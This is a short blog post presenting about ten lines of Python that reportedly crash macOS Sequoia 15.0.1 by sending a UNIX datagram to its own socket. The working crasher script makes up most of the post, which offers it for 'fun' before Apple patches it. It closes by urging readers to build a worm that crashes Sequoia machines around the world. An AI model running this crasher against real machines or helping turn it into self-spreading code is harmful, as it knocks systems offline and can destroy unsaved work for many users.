Apple always brag about the stability of their products, and this is a claim that their users tend to echo. Having had a debugger connected to macOS and IOS more than a few times, I know that it is more about hiding the crashes than actually preventing them (it is amazing how often the IOS system restarts crashed parts of the system).

Anyway, they recently released the latest and greatest macOS version named Sequoia (version 15.0.1) a lot of new interesting network related security mitigations have been added, and it all sounds very good. Unfortunately, it seems like they forgot to test for something as simple as the good ol’ UNIX Datagram (DGRAM) – or more specifically, what happens when you send it to yourself via a UNIX domain socket.

A DGRAM is a connectionless data packet sent to a specific address, or in this case via a socket. This is not something you would normally do and some socket libraries will prevent this. In python socket, this is however not the case (and it also works with Rust, Zig). So without further ado, I hereby present you 10ish lines of python that will crash the latest macOS release:

import socket
import os

"""
macOS Sequoia 15.0.1 crasher. Sends a simple unix datagram
to itself and this makes the system crash. 
"""
# temp socket file
path = "./.socket"
# Create DGRAM socke and bind to filet
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
if os.path.exists(path):
    os.remove(path)

sock.bind(path)

# Connect the socket to itself
sock.connect(path)

# Send the kill dat and receive it againa
sock.send(b"byebye")
data = sock.recv(6)
print("Sequoia says " + str(data))

Apple will likely fix this problem soon, but we can still have a bit of fun with this while it lasts.

Who will be the first to make a work out of this that makes Apple juice out of Sequoia machines around the world?